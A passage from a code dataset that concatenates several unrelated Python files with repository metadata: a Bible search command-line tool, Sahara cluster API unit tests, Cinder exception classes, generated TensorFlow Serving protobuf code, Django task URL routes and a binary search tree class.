if '+strongs' in arg_list:
show_strongs = True
arg_list.remove('+strongs')
if '+morph' in args:
show_morph = True
arg_list.remove('+morph')
if '-strongs' in args:
show_strongs = False
arg_list.remove('-strongs')
if '-morph' in args:
show_strongs = False
arg_list.remove('-morph')
if '+notes' in args:
show_notes = True
arg_list.remove('+notes')
if '-notes' in args:
show_notes = False
arg_list.remove('-notes')
if '+one_line' in args:
one_line = True
arg_list.remove('+one_line')
if '-one_line' in args:
one_line = False
arg_list.remove('-one_line')
if '+added' in args:
search_added = True
arg_list.remove('+added')
if '-added' in args:
search_added = False
arg_list.remove('-added')
if search_range:
results.intersection_update(parse_verse_range(search_range))
if not highlight_list:
# Highlight anything else the user typed in.
highlight_list = arg_list
# Don't modify regular expression searches.
if search_type != 'regex':
regx_list = build_highlight_regx(highlight_list, case_sensitive,
(search_type == 'ordered_multiword'))
if kwargs['context']:
regx_list.extend(build_highlight_regx(results, case_sensitive))
else:
arg_str = ' '.join(arg_list)
regx_list = [re.compile(arg_str, re.I if case_sensitive else 0)]
# Flags for the highlight string.
flags = re.I if not case_sensitive else 0
# Add the specified number of verses before and after to provide
# context.
context_results = sorted(add_context(results, kwargs['context']),
key=sort_key)
# Get a formated verse string generator.
verse_gen = render_verses_with_italics(context_results,
not one_line,
show_strongs, show_morph,
search_added,
show_notes,
highlight_search_terms,
module_name, regx_list,
highlight_text, flags)
if one_line:
# Print it all on one line.
print(' '.join(verse_gen))
else:
# Print the verses on seperate lines.
self._print(verse_gen)
#print('\n'.join(verse_gen))
def complete_lookup(self, text, line, begidx, endidx):
""" Try to complete Verse references.
"""
name_list = self._book_list
text = text.capitalize()
return self._complete(text, line, begidx, endidx, name_list)
def do_lookup(self, args):
""" Lookup the verses by references.
Example: lookup gen1:3-5;mal3 (Look up Genesis chapter 1 verses
3-5 and Malachi chapter 3.)
"""
self._results = parse_verse_range(args)
self._highlight_list = []
def complete_strongs(self, text, line, begidx, endidx):
""" Tabe complete Strong's numbers.
"""
text = text.capitalize()
return self._complete(text, line, begidx, endidx, self._strongs)
def do_strongs(self, numbers):
""" Lookup one or more Strong's Numbers.
strongs number,number,number....
"""
# Lookup all the Strong's Numbers in the argument list.
# Make all the numbers seperated by a comma.
strongs_list = ','.join(numbers.upper().split()).split(',')
#TODO: Find what Strong's Modules are available and use the best,
# or let the user decide.
greek_strongs_lookup = Lookup('StrongsRealGreek')
hebrew_strongs_lookup = Lookup('StrongsRealHebrew')
for strongs_num in strongs_list:
# Greek Strong's Numbers start with a 'G' and Hebrew ones start
# with an 'H.'
if strongs_num.upper().startswith('G'):
mod_name = 'StrongsRealGreek'
else:
mod_name = 'StrongsRealHebrew'
print('%s\n' % mod_lookup(mod_name, strongs_num[1:]))
def complete_morph(self, text, line, begidx, endidx):
""" Tabe complete Morphological Tags.
"""
text = text.capitalize()
return self._complete(text, line, begidx, endidx, self._morph)
def do_morph(self, tags):
""" Lookup one or more Morphological Tags.
morph tag,tag,tag....
"""
# Lookup all the Morphological Tags in the argument list.
# I don't know how to lookup Hebrew morphological tags, so I
# only lookup Greek ones in 'Robinson.'
print('%s\n' % mod_lookup('Robinson', tags.upper()))
def do_websters(self, words):
""" Lookup one or more words in Websters Dictionary.
websters word,word,word...
"""
# Lookup words in the dictionary.
print('%s\n' % mod_lookup('WebstersDict', words))
def do_kjvd(self, words):
""" Lookup one or more words in the KJV Dictionary.
kjvd word,word,word...
"""
# Lookup words in the KJV dictionary.
print('%s\n' % mod_lookup('KJVD', words))
def do_daily(self, daily):
""" Display a daily devotional from 'Bagsters Daily light.'
daily date/today
Dates are given in the format Month.Day. The word 'today' is an alias
to today's date. The default is to lookup today's devotional.
"""
daily = 'today' if not daily else daily
# Lookup the specified daily devotional.
if daily.lower() == 'today':
# Today is an alias for today's date.
daily = strftime('%m.%d')
daily_lookup = Lookup('Daily')
# Try to make the output nicer.
print(daily_lookup.get_formatted_text(daily))
def complete_set(self, text, line, begidx, endidx):
""" Complete setting options.
"""
setting_list = self._setting_dict.keys()
return self._complete(text, line, begidx, endidx, setting_list)
def do_set(self, args):
""" Set settings.
Run without arguments to see the current settings.
set show_strongs = True/False - Enable strongs numbers in the
output.
set show_morph = True/False - Enable morphology in the output.
set context = <number> - Show <number> verses of context.
set case_sensitive = True/False - Set the search to case sensitive.
set range = <range> - Confine search/output to <range>.
set one_line = True/False - Don't break output at verses.
set added = True/False - Show/search added text.
set show_notes = True/False - Show foot-notes in output.
set search_type = <type> - Use <type> for searching.
set search_strongs = True/False - Search Strong's numbers
(deprecated).
set search_morph = True/False - Search Morphological Tags
(deprecated).
"""
if not args:
print("Current settings:\n")
max_len = len(max(self._setting_dict.keys(), key=len))
for setting, value in self._setting_dict.items():
if setting.lower() == 'range':
if not Sword:
value = VerseRange.parse_range(value)
value = '; '.join(str(i) for i in value)
else:
key = Sword.VerseKey()
range_list = key.parseVerseList(value, 'Genesis 1:1',
True, False)
value = range_list.getRangeText()
print('{1:{0}} = {2}'.format(max_len, setting, value))
print()
else:
for setting in args.split(';'):
if '=' in setting:
k, v = setting.split('=')
elif ' ' in setting:
k, v = setting.split()
else:
print(self._setting_dict.get(setting, ''))
continue
k = k.strip()
v = v.strip()
if isinstance(v, str):
if v.lower() == 'false':
v = False
elif v.lower() == 'true':
v = True
elif v.isdigit():
v = int(v)
self._setting_dict[k] = v
def complete_search(self, text, line, begidx, endidx):
""" Bible word completion to make searching easier.
"""
words_list = self._words
return self._complete(text, line, begidx, endidx, words_list)
complete_mixed = complete_search
complete_mixed_phrase = complete_search
complete_multiword = complete_search
complete_anyword = complete_search
complete_combined = complete_search
complete_partial_word = complete_search
complete_ordered_multiword = complete_search
complete_regex = complete_search
complete_eitheror = complete_search
complete_sword_lucene = complete_search
complete_sword_phrase = complete_search
complete_sword_multiword = complete_search
complete_sword_entryattrib = complete_search
def do_search(self, args):
""" Search the Bible.
Search types are:
mixed - A search made up of a mix of most of the
other search types. Put an '!' in front of
words/phrases that you don't want in any of
the results.
mixed_phrase - A phrase search that can include words,
Strong's, and Morphology. Can be used in
the mixed search by including words in
quotes.
multiword - Search for verses containing each word at
least once. Use in the mixed search by
putting a '+' in front of any word/phrase
you want to be in all the results.
anyword - Search for verses containing one or more of
any of the words. Use in the mixed search
by putting a '|' in front of any
word/phrase you want in any but not
necessarily all the results.
eitheror - Search for verses containing one and only
one of the words. In the mixed search put
a '^' in front of two or more words/phrases
to make the results contain one and only
one of the marked search terms.
combined - Search using a phrase like ('in' AND ('the'
OR 'it')) finding verses that have both
'in' and 'the' or both 'in' and 'it'.
To do the same thing with the mixed search
use a phrase like this:
(mixed '+in' '^the' '^it').
partial_word - Search for partial words (e.g. a search for
'begin*' would find all the words starting
with 'begin'.) Use in the mixed search to
make partial words in a phrase.
ordered_multiword - Search for words in order, but not
necessarily in a phrase. In the mixed
search put a '~' in front of any quoted
group of words you want to be in that
order, but you don't mind if they have
other words between them.
regex - A regular expression search (slow).
Examples:
mixed - (mixed '+~in the beg*' '!was') finds any
verse that has the words 'in', 'the', and
any word starting with 'beg', in order, but
not the word 'was.'
mixed_phrase - (mixed_phrase 'h011121 of gomer') finds any
verse with that phrase.
mixed search flags first column prefix (these should come first):
----------------------------------------------------------------
! = not (not in any of the results)
+ = all (in all the results)
| = or (in at least one result)
^ = exclusive or (only one in any of the results)
not example: (mixed 'in the beginning' !was) results will have the
phrase 'in the beginning' but will not have the word
'was.'
all example: (mixed 'in the beginning' +was) results may have the
phrase 'in the beginning' but all of them will have
the word 'was.' (note. this will find all verses with
the word 'was' in them if you want it to have the
phrase 'in the beginning' also you have to prefix it
with a '+' aswell)
or example: (mixed 'in the beginning' |was) results will be all the
verses with the phrase 'in the beginning' and all the
verses with the word 'was.' This is the default way
the mixed search operates, so the '|' can be excluded
in this case.
exclusive or example: (mixed '^in the beginning' '^was') results
will either have the phrase 'in the
beginning' or the word 'was', but not both.
To be effective you must have at least two
search terms prefixed with '^.'
mixed search flags second column prefix (these come after the first
column flags):
-------------------------------------------------------------------
~ = sloppy phrase or ordered multiword
& = regular expression search.
sloppy phrase example: (mixed '~in the beginning') results will
have all the words 'in', 'the', and
'beginning,' but they may have other words
between them.
regular expression example:
(mixed '&\\b[iI]n\\b\s+\\b[tT[Hh][eE]\\b\s+\\b[bB]eginning\\b')
results will be all the verses with the phrase 'in the beginning.'
"""
if not args:
return
arg_list = self._get_list(args)
arg_str = ' '.join(arg_list)
self._search_list = arg_list
extras = self._setting_dict['extras']
search_type = self._setting_dict['search_type']
try:
# Get the search function asked for.
search_func = getattr(self._search, '%s_search' % search_type)
except AttributeError as err:
# An invalid search type was specified.
print("Invalid search type: %s" % search_type, file=sys.stderr)
exit()
# Search.
strongs_search = self._setting_dict['search_strongs']
morph_search = self._setting_dict['search_morph']
search_range = self._setting_dict['range']
case_sensitive = self._setting_dict['case_sensitive']
search_added = self._setting_dict['added']
self._results = search_func(arg_list, strongs_search, morph_search,
search_added, case_sensitive, search_range,
*extras)
count = len(self._results)
info_print("\nFound %s verse%s.\n" % \
(count, 's' if count != 1 else ''),
tag=-10)
print("To view the verses type 'show_results.'")
if search_type in ['combined', 'combined_phrase']:
# Combined searches are complicated.
# Parse the search argument and build a highlight string from the
# result.
arg_parser = CombinedParse(arg_str)
parsed_args = arg_parser.word_list
not_l = arg_parser.not_list
# Remove any stray '+'s.
#highlight_str = highlight_str.replace('|+', ' ')
if search_type == 'combined_phrase':
# A phrase search needs to highlight phrases.
highlight_list = parsed_args
else:
highlight_list = ' '.join(parsed_args).split()
# Build the highlight string for the other searches.
elif search_type in ['anyword', 'multiword', 'eitheror',
'partial_word']:
# Highlight each word separately.
highlight_list = arg_str.split()
elif search_type == 'mixed':
# In mixed search phrases are in quotes so the arg_list should be
# what we want, but don't include any !'ed words.
highlight_list = [i for i in arg_list if not i.startswith('!')]
elif search_type in ['phrase', 'mixed_phrase', 'ordered_multiword']:
# Phrases should highlight phrases.
highlight_list = [arg_str]
elif search_type == 'sword':
highlight_list = arg_list
self._highlight_list = highlight_list
do_mixed = do_search
do_mixed_phrase = do_search
do_multiword = do_search
do_anyword = do_search
do_combined = do_search
do_partial_word = do_search
do_ordered_multiword = do_search
do_regex = do_search
do_eitheror = do_search
do_sword_lucene = do_search
do_sword_phrase = do_search
do_sword_multiword = do_search
do_sword_entryattrib = do_search
|
zepto/biblesearch.web
|
sword_search.old/search.py
|
Python
|
gpl-3.0
| 146,124 | 0.000561 |
# Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
import oslo_messaging
import six
import testtools
from sahara import conductor as cond
from sahara import context
from sahara import exceptions as exc
from sahara.plugins import base as pl_base
from sahara.plugins import provisioning as pr_base
from sahara.service import api as service_api
from sahara.service.api import v10 as api
from sahara.tests.unit import base
from sahara.utils import cluster as c_u
conductor = cond.API
SAMPLE_CLUSTER = {
'plugin_name': 'fake',
'hadoop_version': 'test_version',
'tenant_id': 'tenant_1',
'name': 'test_cluster',
'user_keypair_id': 'my_keypair',
'node_groups': [
{
'auto_security_group': True,
'name': 'ng_1',
'flavor_id': '42',
'node_processes': ['p1', 'p2'],
'count': 1
},
{
'auto_security_group': False,
'name': 'ng_2',
'flavor_id': '42',
'node_processes': ['p3', 'p4'],
'count': 3
},
{
'auto_security_group': False,
'name': 'ng_3',
'flavor_id': '42',
'node_processes': ['p3', 'p4'],
'count': 1
}
],
'cluster_configs': {
'service_1': {
'config_2': 'value_2'
},
'service_2': {
'config_1': 'value_1'
}
},
}
SCALE_DATA = {
'resize_node_groups': [
{
'name': 'ng_1',
'count': 3,
},
{
'name': 'ng_2',
'count': 2,
}
],
'add_node_groups': [
{
'auto_security_group': True,
'name': 'ng_4',
'flavor_id': '42',
'node_processes': ['p1', 'p2'],
'count': 1
},
]
}
class FakePlugin(pr_base.ProvisioningPluginBase):
_info = {}
name = "fake"
def __init__(self, calls_order):
self.calls_order = calls_order
def configure_cluster(self, cluster):
pass
def start_cluster(self, cluster):
pass
def get_description(self):
return "Some description"
def get_title(self):
return "Fake plugin"
def validate(self, cluster):
self.calls_order.append('validate')
def get_open_ports(self, node_group):
self.calls_order.append('get_open_ports')
def validate_scaling(self, cluster, to_be_enlarged, additional):
self.calls_order.append('validate_scaling')
def get_versions(self):
return ['0.1', '0.2']
def get_node_processes(self, version):
return {'HDFS': ['namenode', 'datanode']}
def get_configs(self, version):
return []
def recommend_configs(self, cluster, scaling=False):
self.calls_order.append('recommend_configs')
class FakePluginManager(pl_base.PluginManager):
def __init__(self, calls_order):
super(FakePluginManager, self).__init__()
self.plugins['fake'] = FakePlugin(calls_order)
class FakeOps(object):
def __init__(self, calls_order):
self.calls_order = calls_order
def provision_cluster(self, id):
self.calls_order.append('ops.provision_cluster')
conductor.cluster_update(
context.ctx(), id, {'status': c_u.CLUSTER_STATUS_ACTIVE})
def provision_scaled_cluster(self, id, to_be_enlarged):
self.calls_order.append('ops.provision_scaled_cluster')
# Set scaled to see difference between active and scaled
for (ng, count) in six.iteritems(to_be_enlarged):
conductor.node_group_update(context.ctx(), ng, {'count': count})
conductor.cluster_update(context.ctx(), id, {'status': 'Scaled'})
def terminate_cluster(self, id):
self.calls_order.append('ops.terminate_cluster')
class TestApi(base.SaharaWithDbTestCase):
def setUp(self):
super(TestApi, self).setUp()
self.calls_order = []
self.override_config('plugins', ['fake'])
pl_base.PLUGINS = FakePluginManager(self.calls_order)
service_api.setup_api(FakeOps(self.calls_order))
oslo_messaging.notify.notifier.Notifier.info = mock.Mock()
self.ctx = context.ctx()
@mock.patch('sahara.service.quotas.check_cluster', return_value=None)
def test_create_cluster_success(self, check_cluster):
cluster = api.create_cluster(SAMPLE_CLUSTER)
self.assertEqual(1, check_cluster.call_count)
result_cluster = api.get_cluster(cluster.id)
self.assertEqual(c_u.CLUSTER_STATUS_ACTIVE, result_cluster.status)
expected_count = {
'ng_1': 1,
'ng_2': 3,
'ng_3': 1,
}
ng_count = 0
for ng in result_cluster.node_groups:
self.assertEqual(expected_count[ng.name], ng.count)
ng_count += 1
self.assertEqual(3, ng_count)
api.terminate_cluster(result_cluster.id)
self.assertEqual(
['get_open_ports', 'recommend_configs', 'validate',
'ops.provision_cluster',
'ops.terminate_cluster'], self.calls_order)
@mock.patch('sahara.service.quotas.check_cluster', return_value=None)
def test_create_multiple_clusters_success(self, check_cluster):
MULTIPLE_CLUSTERS = SAMPLE_CLUSTER.copy()
MULTIPLE_CLUSTERS['count'] = 2
clusters = api.create_multiple_clusters(MULTIPLE_CLUSTERS)
self.assertEqual(2, check_cluster.call_count)
result_cluster1 = api.get_cluster(clusters['clusters'][0])
result_cluster2 = api.get_cluster(clusters['clusters'][1])
self.assertEqual(c_u.CLUSTER_STATUS_ACTIVE, result_cluster1.status)
self.assertEqual(c_u.CLUSTER_STATUS_ACTIVE, result_cluster2.status)
expected_count = {
'ng_1': 1,
'ng_2': 3,
'ng_3': 1,
}
ng_count = 0
for ng in result_cluster1.node_groups:
self.assertEqual(expected_count[ng.name], ng.count)
ng_count += 1
self.assertEqual(3, ng_count)
api.terminate_cluster(result_cluster1.id)
api.terminate_cluster(result_cluster2.id)
self.assertEqual(
['get_open_ports', 'recommend_configs', 'validate',
'ops.provision_cluster',
'get_open_ports', 'recommend_configs', 'validate',
'ops.provision_cluster',
'ops.terminate_cluster',
'ops.terminate_cluster'], self.calls_order)
@mock.patch('sahara.service.quotas.check_cluster')
def test_create_multiple_clusters_failed(self, check_cluster):
MULTIPLE_CLUSTERS = SAMPLE_CLUSTER.copy()
MULTIPLE_CLUSTERS['count'] = 2
check_cluster.side_effect = exc.QuotaException(
'resource', 'requested', 'available')
with testtools.ExpectedException(exc.QuotaException):
api.create_cluster(SAMPLE_CLUSTER)
self.assertEqual('Error', api.get_clusters()[0].status)
@mock.patch('sahara.service.quotas.check_cluster')
def test_create_cluster_failed(self, check_cluster):
check_cluster.side_effect = exc.QuotaException(
'resource', 'requested', 'available')
with testtools.ExpectedException(exc.QuotaException):
api.create_cluster(SAMPLE_CLUSTER)
self.assertEqual('Error', api.get_clusters()[0].status)
@mock.patch('sahara.service.quotas.check_cluster', return_value=None)
@mock.patch('sahara.service.quotas.check_scaling', return_value=None)
def test_scale_cluster_success(self, check_scaling, check_cluster):
cluster = api.create_cluster(SAMPLE_CLUSTER)
api.scale_cluster(cluster.id, SCALE_DATA)
result_cluster = api.get_cluster(cluster.id)
self.assertEqual('Scaled', result_cluster.status)
expected_count = {
'ng_1': 3,
'ng_2': 2,
'ng_3': 1,
'ng_4': 1,
}
ng_count = 0
for ng in result_cluster.node_groups:
self.assertEqual(expected_count[ng.name], ng.count)
ng_count += 1
self.assertEqual(4, ng_count)
api.terminate_cluster(result_cluster.id)
self.assertEqual(
['get_open_ports', 'recommend_configs', 'validate',
'ops.provision_cluster', 'get_open_ports', 'get_open_ports',
'recommend_configs', 'validate_scaling',
'ops.provision_scaled_cluster',
'ops.terminate_cluster'], self.calls_order)
@mock.patch('sahara.service.quotas.check_cluster', return_value=None)
@mock.patch('sahara.service.quotas.check_scaling', return_value=None)
def test_scale_cluster_failed(self, check_scaling, check_cluster):
cluster = api.create_cluster(SAMPLE_CLUSTER)
check_scaling.side_effect = exc.QuotaException(
'resource', 'requested', 'available')
with testtools.ExpectedException(exc.QuotaException):
api.scale_cluster(cluster.id, {})
def test_cluster_update(self):
with mock.patch('sahara.service.quotas.check_cluster'):
cluster = api.create_cluster(SAMPLE_CLUSTER)
updated_cluster = api.update_cluster(
cluster.id, {'description': 'Cluster'})
self.assertEqual('Cluster', updated_cluster.description)
def test_get_plugin(self):
# processing to dict
data = api.get_plugin('fake', '0.1').dict
self.assertIsNotNone(data)
self.assertEqual(
len(pr_base.list_of_common_configs()), len(data.get('configs')))
self.assertEqual(['fake', '0.1'], data.get('required_image_tags'))
self.assertEqual(
{'HDFS': ['namenode', 'datanode']}, data.get('node_processes'))
self.assertIsNone(api.get_plugin('fake', '0.3'))
data = api.get_plugin('fake').dict
self.assertIsNotNone(data.get('version_labels'))
self.assertIsNotNone(data.get('plugin_labels'))
del data['plugin_labels']
del data['version_labels']
self.assertEqual({
'description': "Some description",
'name': 'fake',
'title': 'Fake plugin',
'versions': ['0.1', '0.2']}, data)
self.assertIsNone(api.get_plugin('name1', '0.1'))
def test_update_plugin(self):
data = api.get_plugin('fake', '0.1').dict
self.assertIsNotNone(data)
updated = api.update_plugin('fake', values={
'plugin_labels': {'enabled': {'status': False}}}).dict
self.assertFalse(updated['plugin_labels']['enabled']['status'])
updated = api.update_plugin('fake', values={
'plugin_labels': {'enabled': {'status': True}}}).dict
self.assertTrue(updated['plugin_labels']['enabled']['status'])
# restore to original status
updated = api.update_plugin('fake', values={
'plugin_labels': data['plugin_labels']}).dict
self.assertEqual(data['plugin_labels']['enabled']['status'],
updated['plugin_labels']['enabled']['status'])
|
openstack/sahara
|
sahara/tests/unit/service/api/test_v10.py
|
Python
|
apache-2.0
| 11,635 | 0 |
from cinder.exception import *
from cinder.i18n import _
class ProviderMultiVolumeError(CinderException):
msg_fmt = _("volume %(volume_id)s More than one provider_volume are found")
class ProviderMultiSnapshotError(CinderException):
msg_fmt = _("snapshot %(snapshot_id)s More than one provider_snapshot are found")
class ProviderCreateVolumeError(CinderException):
msg_fmt = _("volume %(volume_id)s create request failed,network or provider internal error")
class ProviderCreateSnapshotError(CinderException):
msg_fmt = _("snapshot %(snapshot_id)s create request failed,network or provider internal error")
class ProviderLocationError(CinderException):
msg_fmt = _("provider location error")
class ProviderExportVolumeError(CinderException):
msg_fmt = _("provider export volume error")
class ProviderVolumeNotFound(NotFound):
message = _("Volume %(volume_id)s could not be found.")
class VgwHostNotFound(NotFound):
message = _("node of %(Vgw_id)s at provider cloud could not be found.")
|
hybrid-storage-dev/cinder-fs-111t-hybrid-cherry
|
volume/drivers/ec2/exception_ex.py
|
Python
|
apache-2.0
| 1,031 | 0.012609 |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: tensorflow_serving/config/platform_config.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import any_pb2 as google_dot_protobuf_dot_any__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='tensorflow_serving/config/platform_config.proto',
package='tensorflow.serving',
syntax='proto3',
serialized_options=_b('\370\001\001'),
serialized_pb=_b('\n/tensorflow_serving/config/platform_config.proto\x12\x12tensorflow.serving\x1a\x19google/protobuf/any.proto\"E\n\x0ePlatformConfig\x12\x33\n\x15source_adapter_config\x18\x01 \x01(\x0b\x32\x14.google.protobuf.Any\"\xc5\x01\n\x11PlatformConfigMap\x12T\n\x10platform_configs\x18\x01 \x03(\x0b\x32:.tensorflow.serving.PlatformConfigMap.PlatformConfigsEntry\x1aZ\n\x14PlatformConfigsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x31\n\x05value\x18\x02 \x01(\x0b\x32\".tensorflow.serving.PlatformConfig:\x02\x38\x01\x42\x03\xf8\x01\x01\x62\x06proto3')
,
dependencies=[google_dot_protobuf_dot_any__pb2.DESCRIPTOR,])
_PLATFORMCONFIG = _descriptor.Descriptor(
name='PlatformConfig',
full_name='tensorflow.serving.PlatformConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='source_adapter_config', full_name='tensorflow.serving.PlatformConfig.source_adapter_config', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=98,
serialized_end=167,
)
_PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY = _descriptor.Descriptor(
name='PlatformConfigsEntry',
full_name='tensorflow.serving.PlatformConfigMap.PlatformConfigsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='tensorflow.serving.PlatformConfigMap.PlatformConfigsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='tensorflow.serving.PlatformConfigMap.PlatformConfigsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('8\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=277,
serialized_end=367,
)
_PLATFORMCONFIGMAP = _descriptor.Descriptor(
name='PlatformConfigMap',
full_name='tensorflow.serving.PlatformConfigMap',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='platform_configs', full_name='tensorflow.serving.PlatformConfigMap.platform_configs', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=170,
serialized_end=367,
)
_PLATFORMCONFIG.fields_by_name['source_adapter_config'].message_type = google_dot_protobuf_dot_any__pb2._ANY
_PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY.fields_by_name['value'].message_type = _PLATFORMCONFIG
_PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY.containing_type = _PLATFORMCONFIGMAP
_PLATFORMCONFIGMAP.fields_by_name['platform_configs'].message_type = _PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY
DESCRIPTOR.message_types_by_name['PlatformConfig'] = _PLATFORMCONFIG
DESCRIPTOR.message_types_by_name['PlatformConfigMap'] = _PLATFORMCONFIGMAP
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PlatformConfig = _reflection.GeneratedProtocolMessageType('PlatformConfig', (_message.Message,), dict(
DESCRIPTOR = _PLATFORMCONFIG,
__module__ = 'tensorflow_serving.config.platform_config_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.serving.PlatformConfig)
))
_sym_db.RegisterMessage(PlatformConfig)
PlatformConfigMap = _reflection.GeneratedProtocolMessageType('PlatformConfigMap', (_message.Message,), dict(
PlatformConfigsEntry = _reflection.GeneratedProtocolMessageType('PlatformConfigsEntry', (_message.Message,), dict(
DESCRIPTOR = _PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY,
__module__ = 'tensorflow_serving.config.platform_config_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.serving.PlatformConfigMap.PlatformConfigsEntry)
))
,
DESCRIPTOR = _PLATFORMCONFIGMAP,
__module__ = 'tensorflow_serving.config.platform_config_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.serving.PlatformConfigMap)
))
_sym_db.RegisterMessage(PlatformConfigMap)
_sym_db.RegisterMessage(PlatformConfigMap.PlatformConfigsEntry)
DESCRIPTOR._options = None
_PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY._options = None
# @@protoc_insertion_point(module_scope)
|
diplomacy/research
|
diplomacy_research/proto/tensorflow_serving/config/platform_config_pb2.py
|
Python
|
mit
| 6,119 | 0.00621 |
from django.conf.urls import url
from DjangoTaskManager.task import views
urlpatterns = [
url(r'^$', views.all_tasks, name='all_tasks'),
url(r'^add/$', views.add, name='task_add'),
url(r'^mark-done/(?P<task_id>[\w+:-]+)/$',
views.mark_done, name='task_mark_done'),
url(r'^edit/(?P<task_id>[\w+:-]+)/$',
views.edit, name='task_edit'),
url(r'^delete/(?P<task_id>[\w+:-]+)/$',
views.delete, name='task_delete'),
url(r'^single/(?P<task_id>[\w+:-]+)/$',
views.single, name='single_task'),
]
|
MaxwellCoriell/DjangoTaskManager
|
DjangoTaskManager/task/urls.py
|
Python
|
mit
| 544 | 0 |
class Node(object):
#a binary search tree has a left node (smaller values) and a right node (greater values)
def __init__(self, data):
self.data = data;
self.left_child = None;
self.right_child = None;
class BinarySearchTree(object):
def __init__(self):
self.root = None;
#inserting items in the tree O(logN) running time
def insert(self, data):
#if the root node is NULL it means this is the first node we insert
if not self.root:
self.root = Node(data);
else:
#there are already nodes in the tree so we have to find the valid place for this node
self.insert_node(data, self.root);
#it has O(logN) running time if the tree is balanced -> it can reduce to O(N)
#thats why AVL trees or red-black trees are needed
def insert_node(self, data, node):
#the data is smaller so we have to go to the left subtree
if data < node.data:
#the left child is not a NULL so we keep going
if node.left_child:
self.insert_node(data, node.left_child);
#the left child is NULL so we can insert the data here
else:
node.left_child = Node(data);
#the data is greater so we have to go to the right subtree
else:
#the right child is not a NULL so we keep going
if node.right_child:
self.insert_node(data, node.right_child);
#the right child is NULL so we can insert the data here
else:
node.right_child = Node(data);
#if the tree is balanced then it has O(logN) running time
def remove_node(self, data, node):
#base case for recursive function calls
if not node:
return node;
#first we have to find the node to remove
#left node -> containts smaller value
#right node -> conatains greater value
if data < node.data:
node.left_child = self.remove_node(data, node.left_child);
elif data > node.data:
node.right_child = self.remove_node(data, node.right_child);
#this is when we find the node we want to remove
else:
#the node is a leaf node: no children at all
if not node.left_child and not node.right_child:
print("Removing a leaf node...");
del node;
return None;
#the node we want to remove has a single right child
if not node.left_child: # node !!!
print("Removing a node with single right child...");
temp_node = node.right_child;
del node;
return temp_node;
#the node we want to remove has a single left child
elif not node.right_child: # node instead of self
print("Removing a node with single left child...");
temp_node = node.left_child;
del node;
return temp_node;
#the node has both left and right children
print("Removing node with two children....");
temp_node = self.get_predecessor(node.left_child); # self instead of elf + get predecessor
node.data = temp_node.data;
node.left_child = self.remove_node(temp_node.data, node.left_child);
#this is how we notify the parent and update the children accordingly
return node;
#get the previous node in the in-order traversal)
def get_predecessor(self, node):
#the predecessor the largest node in the left subtree
#successor: the smallest node in the right subtree
if node.right_child:
return self.get_predecessor(node.right_child);
return node;
#of course if the root is a NULL: we can not remove nodes at all
def remove(self, data):
if self.root:
self.root = self.remove_node(data, self.root);
#it has O(logN) running time complexity
def get_min_value(self):
if self.root:
return self.get_min(self.root);
def get_min(self, node):
#smallest item is the left most node's value
if node.left_child:
return self.get_min(node.left_child);
return node.data;
#it has O(logN) running time complexity
def get_max_value(self):
if self.root:
return self.get_max(self.root);
def get_max(self, node):
#largest item is the right most node's value
if node.right_child:
return self.get_max(node.right_child);
return node.data;
#considering all the nodes in the tree IF there are items (so root node is not NULL)
def traverse(self):
if self.root:
self.traverse_in_order(self.root);
#considering all the items in O(N) running time
#it yields the natural order (numerical ordering or alphabetical ordering)
def traverse_in_order(self, node):
#visit the left subtree
if node.left_child:
self.traverse_in_order(node.left_child);
#then the root node of the subtree
print("%s " % node.data);
#then finally the right subtree recursively
